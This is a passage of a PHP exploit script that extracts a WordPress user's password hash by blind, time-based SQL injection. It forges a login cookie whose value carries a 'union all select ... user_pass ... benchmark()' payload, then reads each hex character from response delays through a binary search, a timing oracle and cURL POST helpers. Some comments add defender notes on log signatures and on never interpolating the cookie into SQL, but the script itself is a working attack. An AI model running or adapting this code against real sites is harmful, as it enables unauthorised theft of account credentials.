$ch\n";
$out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nfinal result: $field=$out\n\n"; return $out; }
///////////////////////////////////////////////////////////////////////
// Recovers one character of column $field (1-based offset $pos) of the row
// with id $id, purely from response timing: every probe is a forged login
// cookie whose value closes the quoted string and appends a conditional
// benchmark(), and the only signal read back is whether the request was
// slow (see test_condition()). Nothing from the response body is used.
// The search assumes the column is hex (an md5-style hash): the first probe
// (ord > 57) decides digit vs. letter, then a binary search runs over
// 48..57 ('0'..'9') or 97..102 ('a'..'f'). Each positive probe costs the
// database $cnt (= 4 * $testcnt) md5() rounds of CPU.
// Defender notes: the payload is visible in access/WAF logs as a cookie
// containing `union all select` and `benchmark(`, the probes show up in the
// slow-query log, and the per-character probe count makes rate limiting on
// the cookie-bearing endpoint effective. On the application side the
// cookie value must never be interpolated into SQL.
function get_hashchar($field,$pos)
{
    global $prefix, $suffix, $id, $testcnt;
    $char = '';
    // 4x the calibration round count so a "true" branch is clearly slower
    // than the delayed mean that test_condition() compares against
    $cnt = $testcnt * 4;
    $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
    $ipattern = " union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(ord(substring($field,$pos,1))%s,benchmark($cnt,md5(1337)),3)/*";
    // first let's determine, if it's number or letter
    $inj = sprintf($ipattern, $prefix, $id, ">57");
    $post = sprintf($ppattern, $suffix, $inj, $suffix);
    $letter = test_condition($post);
    if($letter) {
        $min = 97;
        $max = 102;
        echo "char to find is [a-f]\n";
    } else {
        $min = 48;
        $max = 57;
        echo "char to find is [0-9]\n";
    }
    $curr = 0;
    while(1) {
        $area = $max - $min;
        // down to two candidates: one equality probe decides, and a
        // negative answer is taken to mean $min without re-checking it
        if($area < 2 ) {
            $inj = sprintf($ipattern, $prefix, $id, "=$max");
            $post = sprintf($ppattern, $suffix, $inj, $suffix);
            $eq = test_condition($post);
            if($eq) {
                $char = chr($max);
            } else {
                $char = chr($min);
            }
            break;
        }
        // "greater than $curr" moves $min to $curr rather than $curr+1, so
        // the interval still contains the answer but shrinks a step slower
        $half = intval(floor($area / 2));
        $curr = $min + $half;
        $inj = sprintf($ipattern, $prefix, $id, ">$curr");
        $post = sprintf($ppattern, $suffix, $inj, $suffix);
        $bigger = test_condition($post);
        if($bigger) {
            $min = $curr;
        } else {
            $max = $curr;
        }
        echo "curr: $curr--$max--$min\n";
    }
    // a single probe misjudged by network jitter yields a wrong character;
    // nothing here re-validates the result
    return $char;
}
///////////////////////////////////////////////////////////////////////
// Timing oracle shared by every probe: POSTs $p to $url and returns true when
// the round trip, in deciseconds, exceeds twice $norm_delay (the delayed mean
// from get_normdelay()). A body other than the literal string '-1' is treated
// as a failed attempt and retried up to $maxtry times, then the script exits.
// Note the strictness mismatch with test_md5delay(), which accepts any body
// whose intval() is -1 (e.g. "-1\n") — such a body loops here until exit.
function test_condition($p)
{
    global $url, $norm_delay;
    $bret = false;
    $maxtry = 10;
    $try = 1;
    while(1) {
        $start = getmicrotime();
        $buff = make_post($url, $p);
        $end = getmicrotime();
        if($buff === '-1') {
            break;
        } else {
            echo "test_condition() - try $try - invalid return value ...\n";
            $try ++;
            if($try > $maxtry) {
                die("too many tries - exiting ...\n");
            } else {
                echo "trying again - try $try ...\n";
            }
        }
    }
    // only the last attempt's timing is used
    $diff = $end - $start;
    $delay = intval($diff * 10);
    if($delay > ($norm_delay * 2)) {
        $bret = true;
    }
    return $bret;
}
///////////////////////////////////////////////////////////////////////
// Calibrates the oracle: alternates three cheap probes (1 benchmark round)
// with three forced-slow probes ($testcnt rounds) and returns the mean of
// the slow round trips in deciseconds. The cheap mean is only printed for
// the operator; it is not part of the threshold test_condition() applies.
// Six extra injected requests hit the target before any extraction starts.
function get_normdelay($testcnt)
{
    $fa = test_md5delay(1);
    echo "$fa\n";
    $sa = test_md5delay($testcnt);
    echo "$sa\n";
    $fb = test_md5delay(1);
    echo "$fb\n";
    $sb = test_md5delay($testcnt);
    echo "$sb\n";
    $fc = test_md5delay(1);
    echo "$fc\n";
    $sc = test_md5delay($testcnt);
    echo "$sc\n";
    $mean_nondelayed = intval(($fa + $fb + $fc) / 3);
    echo "mean nondelayed - $mean_nondelayed dsecs\n";
    $mean_delayed = intval(($sa + $sb + $sc) / 3);
    echo "mean delayed - $mean_delayed dsecs\n";
    return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
// One calibration probe: the same cookie injection as get_hashchar(), but
// with a condition (length(user_pass)>31) meant to always hold for a 32-char
// hash, so the server runs benchmark($cnt, md5(1337)) unconditionally.
// Returns the round trip in deciseconds. Exits unless the body evaluates to
// -1 — presumably the marker that the injected query ran; what the target
// actually answers is not visible in this file.
function test_md5delay($cnt)
{
    global $url, $id, $prefix, $suffix;
    // delay in deciseconds
    $delay = -1; // placeholder, always overwritten below
    $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
    $ipattern = ' union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where id=%d and if(length(user_pass)>31,benchmark(%d,md5(1337)),3)/*';
    $inj = sprintf($ipattern, $prefix, $id, $cnt);
    $post = sprintf($ppattern, $suffix, $inj, $suffix);
    $start = getmicrotime();
    $buff = make_post($url, $post);
    $end = getmicrotime();
    // loose check (intval), unlike the strict '-1' comparison in test_condition()
    if(intval($buff) !== -1) {
        die("test_md5delay($cnt) - invalid return value, exiting ...");
    }
    $diff = $end - $start;
    $delay = intval($diff * 10);
    return $delay;
}
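///////////////////////////////////////////////////////////////////////
// Current wall-clock time as a float of seconds with microsecond precision;
// the callers subtract two readings to time one request round trip.
function getmicrotime()
{
    // microtime(true) yields the same float the old explode()/cast sequence
    // built by hand, without the string round trip.
    return microtime(true);
}
///////////////////////////////////////////////////////////////////////
// POSTs $post_fields to $url with cURL and returns the response body as a
// string, or false when the transfer fails (curl_exec's own failure value;
// callers must check for it).
//   $cookie   optional Cookie header value
//   $referer  optional Referer header value
//   $headers  true to prepend the response headers to the returned body
// Redirects are not followed and the connect timeout is 120s. No total
// transfer timeout is set: the callers measure how long the server takes to
// answer, so a cap here would distort that measurement.
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = false)
{
    $ch = curl_init();
    $timeout = 120;
    // cURL option names are case-sensitive constants; the lowercase
    // spellings used before were undefined and fail on PHP 8.
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, 'mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727)');
    if(!empty($cookie)) {
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    }
    if(!empty($referer)) {
        curl_setopt($ch, CURLOPT_REFERER, $referer);
    }
    curl_setopt($ch, CURLOPT_HEADER, $headers === true);
    $fc = curl_exec($ch);
    curl_close($ch);
    return $fc;
}
///////////////////////////////////////////////////////////////////////
// Appends $buf plus a newline to the file named by the global $outfile.
// Best-effort progress log: a failed write is reported on stdout instead of
// aborting the run (the old fopen/fwrite pair passed a false handle to
// fwrite() when the open failed).
function add_line($buf)
{
    global $outfile;
    // FILE_APPEND|LOCK_EX is the atomic equivalent of fopen('ab')/fwrite/fclose
    if(file_put_contents($outfile, $buf . "\n", FILE_APPEND | LOCK_EX) === false) {
        echo "add_line() - could not write to $outfile\n";
    }
}
///////////////////////////////////////////////////////////////////////
?>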